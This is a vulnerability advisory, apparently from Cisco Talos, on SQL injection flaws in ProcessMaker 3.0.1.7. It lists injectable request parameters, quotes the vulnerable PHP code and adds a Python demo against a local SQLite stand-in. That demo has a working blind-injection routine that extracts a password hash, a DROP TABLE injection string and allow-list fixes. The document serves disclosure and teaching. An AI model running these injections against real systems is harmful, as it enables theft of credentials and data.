Headline
CVE-2016-9048: TALOS-2017-0313 || Cisco Talos Intelligence Group
Summary
Multiple exploitable SQL injection vulnerabilities exist in ProcessMaker Enterprise Core 3.0.1.7-community. Specially crafted web requests can cause SQL injection: an attacker can send a web request whose parameters contain SQL injection payloads to trigger these vulnerabilities, potentially allowing exfiltration of the database (including user credentials) and, in certain setups, access to the underlying operating system.
Tested Versions
ProcessMaker Enterprise Core 3.0.1.7-community
Product URLs
https://www.processmaker.com/community-2
CVSSv3 Score
7.4 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
CWE
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
Details
SQL injection has been found and confirmed within ProcessMaker Enterprise Core. A successful attack could allow an attacker to access information such as usernames and password hashes stored in the database.
The following URLs and parameters have been confirmed to suffer from SQL injection and could be exploited by authenticated attackers:
GET /sysworkflow/en/neoclassic/events/eventsAjax?request=eventList&start=1&limit=25&process=1&type=1&status=1&sort=[SQL INJECTION]&dir=ASC HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
POST /sysworkflow/en/neoclassic/cases/proxyPMTablesSaveFields.php HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
callback=1&dir=1&sort=[SQL INJECTION]&query=1&table=1&action=1
POST /sysworkflow/en/neoclassic/cases/proxyProcessList.php?t=1&callback=a&dir=/&query=13 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
sort=[SQL INJECTION]
GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?function=changeLabel&cat=1[SQL INJECTION]&node=1&lang=1&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?function=changeLabel&cat=1&node=1&lang=1[SQL INJECTION]&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
GET /sysworkflow/en/neoclassic/tools/translationsAjax.php?function=changeLabel&cat=1&node=1[SQL INJECTION]&lang=1&langLabel=1&label=1 HTTP/1.1
Host: box
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://box/sysworkflow/en/neoclassic/login/authentication.php
Cookie: workspaceSkin=neoclassic; PHPSESSID=PCSLlabz
Connection: close
Unauthenticated SQL injection:
GET /gulliver/genericAjax?request=storeInTmp&pkt=int&pk=[SQL Injection]&table=a[SQL Injection]&cnn=[CONNECTION NAME] HTTP/1.1
Host: 192.168.56.101
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

Note: For this SQL injection to work, the 'cnn' parameter needs to be known, as it names the Propel connection used to reach the database. The following code, reachable directly through the genericAjax endpoint without authentication, is responsible for the issue:
gulliver/methods/genericAjax.php, lines 173-200 (lines 175-176 are omitted in the advisory):
case 'storeInTmp':
    try {
        // The connection name is taken straight from the query string.
        $con = Propel::getConnection($_GET['cnn']);
        if ($_GET['pkt'] == 'int') {
            // 'pk' and 'table' are interpolated as raw identifiers: no quoting, no allow-list.
            $rs = $con->executeQuery("SELECT MAX({$_GET['pk']}) as lastId FROM {$_GET['table']};");
            $rs->next();
            $row = $rs->getRow();
            $gKey = (int)$row['lastId'] + 1;
        } else {
            $gKey = G::encryptOld(date('Y-m-d H:i:s').'@'.rand());
        }

        // 'table', 'pk', 'fld' and 'value' are all interpolated unescaped into the INSERT.
        $rs = $con->executeQuery("INSERT INTO {$_GET['table']} ({$_GET['pk']}, {$_GET['fld']}) VALUES ('$gKey', '{$_GET['value']}');");

        echo "{status: 1, message: \"success\"}";
    } catch (Exception $e) {
        // The raw database error message is echoed back to the client.
        $err = $e->getMessage();
        //$err = eregi_replace("[\n|\r|\n\r]", ' ', $err);
        $err = preg_replace("[\n|\r|\n\r]", " ", $err); //Made compatible to PHP 5.3

        echo "{status: 0, message: \"" . $err . "\"}";
    }
    break;
}
}
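The example below is added here to illustrate both injection shapes in this advisory and is not code from the advisory or from ProcessMaker. It uses an in-memory SQLite database as a stand-in for ProcessMaker's MySQL backend (an assumption; the dialect differs in details), with constructed table names, rows and fake hashes. The first vulnerable function assumes that the authenticated endpoints place the sort= parameter into an ORDER BY clause, which the parameter names suggest but the advisory does not show; the second reproduces the SELECT MAX({pk}) ... FROM {table} shape from genericAjax.php exactly. Note that the real storeInTmp handler only echoes "success" or the database error text, so against ProcessMaker an attacker would pull data out through that error message or the subsequent INSERT rather than seeing the MAX() result returned as it is here. The hardened functions show the fix for identifier positions: since a table or column name cannot be bound as a parameter, it is mapped through an allow-list (and checked against the live schema), and only the value is bound.

```python
import sqlite3

# Constructed sample schema and data (fake hashes); stands in for the MySQL
# tables ProcessMaker actually uses, which this example does not reproduce.
SAMPLE_SCHEMA = """
CREATE TABLE users (usr_uid INTEGER PRIMARY KEY, usr_username TEXT, usr_password TEXT);
INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO users VALUES (2, 'alice', 'e10adc3949ba59abbe56e057f20f883e');
CREATE TABLE events (evn_uid INTEGER PRIMARY KEY, evn_name TEXT);
INSERT INTO events VALUES (1, 'first'), (2, 'second'), (3, 'third');
CREATE TABLE tmp_store (id INTEGER, fld TEXT);
"""


def make_db():
    """In-memory SQLite database loaded with the constructed sample data."""
    con = sqlite3.connect(":memory:")
    con.executescript(SAMPLE_SCHEMA)
    return con


# ---- vulnerable query shapes, mirroring the advisory's string interpolation ----

def vulnerable_event_list(con, sort, direction="ASC"):
    """'sort' lands unquoted in ORDER BY, the way sort= is assumed to be handled
    by the authenticated endpoints (the advisory does not show that query)."""
    rows = con.execute(f"SELECT evn_uid FROM events ORDER BY {sort} {direction}")
    return [r[0] for r in rows]


def vulnerable_store_in_tmp(con, table, pk):
    """Same shape as genericAjax.php: SELECT MAX({$_GET['pk']}) as lastId FROM {$_GET['table']}.
    Both identifiers are attacker-chosen, so any column of any table can be selected."""
    row = con.execute(f"SELECT MAX({pk}) as lastId FROM {table};").fetchone()
    return row[0]


def leak_hash_char_via_sort(con, position, guess):
    """Boolean-based oracle through ORDER BY: the row order flips depending on
    whether the guessed character of admin's hash is right. True on a hit."""
    payload = ("(CASE WHEN (SELECT substr(usr_password, %d, 1) FROM users "
               "WHERE usr_username = 'admin') = '%s' THEN evn_uid ELSE -evn_uid END)"
               % (position, guess))
    return vulnerable_event_list(con, payload) == [1, 2, 3]


def recover_hash_via_sort(con, length=4, alphabet="0123456789abcdef"):
    """Drive the oracle character by character (a prefix only, to keep it short)."""
    recovered = ""
    for pos in range(1, length + 1):
        recovered += next(c for c in alphabet if leak_hash_char_via_sort(con, pos, c))
    return recovered


# ---- hardened versions: identifiers cannot be bound as parameters, so allow-list them ----

SORT_COLUMNS = {"uid": "evn_uid", "name": "evn_name"}   # request key -> real column
ALLOWED_TMP_TABLES = {"tmp_store"}                        # the only table the endpoint may touch


def safe_event_list(con, sort, direction="ASC"):
    """Map the request's sort key to a known column; reject anything else."""
    if sort not in SORT_COLUMNS or direction not in ("ASC", "DESC"):
        raise ValueError("invalid sort parameters")
    rows = con.execute(f"SELECT evn_uid FROM events ORDER BY {SORT_COLUMNS[sort]} {direction}")
    return [r[0] for r in rows]


def safe_store_in_tmp(con, table, pk, fld, value):
    """Check the table against the allow-list and the columns against the live
    schema, then bind the value as a parameter instead of interpolating it."""
    if table not in ALLOWED_TMP_TABLES:
        raise ValueError("table not permitted")
    columns = {r[1] for r in con.execute(f"PRAGMA table_info({table})")}
    if pk not in columns or fld not in columns:
        raise ValueError("unknown column")
    last = con.execute(f'SELECT MAX("{pk}") FROM "{table}"').fetchone()[0]
    new_key = (last or 0) + 1
    con.execute(f'INSERT INTO "{table}" ("{pk}", "{fld}") VALUES (?, ?)', (new_key, value))
    return new_key


if __name__ == "__main__":
    db = make_db()
    print("leaked hash prefix via sort=:", recover_hash_via_sort(db))
    print("MAX() over attacker-chosen column:", vulnerable_store_in_tmp(db, "users", "usr_password"))
    print("safe insert got key", safe_store_in_tmp(db, "tmp_store", "id", "fld", "x'); DROP TABLE users; --"))
```

On MySQL the schema check in safe_store_in_tmp would query information_schema.columns and quote identifiers with backticks instead of double quotes; the principle is the same: identifiers come from an allow-list or the catalogue, never from the request, and values travel as bound parameters.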
Mitigation
Restrict access to known, trusted users and hosts.
Timeline
2016-02-15 - Vendor Disclosure
2017-07-19 - Public Release
Discovered by Jerzy Kramarz of Portcullis Computer Security Limited.